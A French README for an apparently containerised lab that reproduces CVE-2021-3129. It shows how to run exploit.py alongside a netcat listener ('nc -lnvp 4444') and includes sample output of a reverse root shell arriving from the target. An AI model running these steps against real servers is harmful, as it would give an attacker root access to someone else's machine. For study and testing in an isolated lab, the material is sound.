Placez vous à la racine du projet et dans un terminal, lancez :
docker-compose build
docker-compose up -d
docker-compose exec exploit bash
Une fois connecté sur le conteneur, lancez :
(python3 exploit.py &); nc -lnvp 4444
Vous devriez voir apparaître un shell vers la machine exploitée :
Listening on 0.0.0.0 4444
Connection received on 172.x.x.x xxxx
bash: cannot set terminal process group (1): Not a tty
bash: no job control in this shell
bash-5.0#
Vous pouvez vérifier que vous êtes bien root
en faisant :
bash-5.0# whoami
whoami
root
CVE: https://nvd.nist.gov/vuln/detail/CVE-2021-3129
Exploits:
Articles: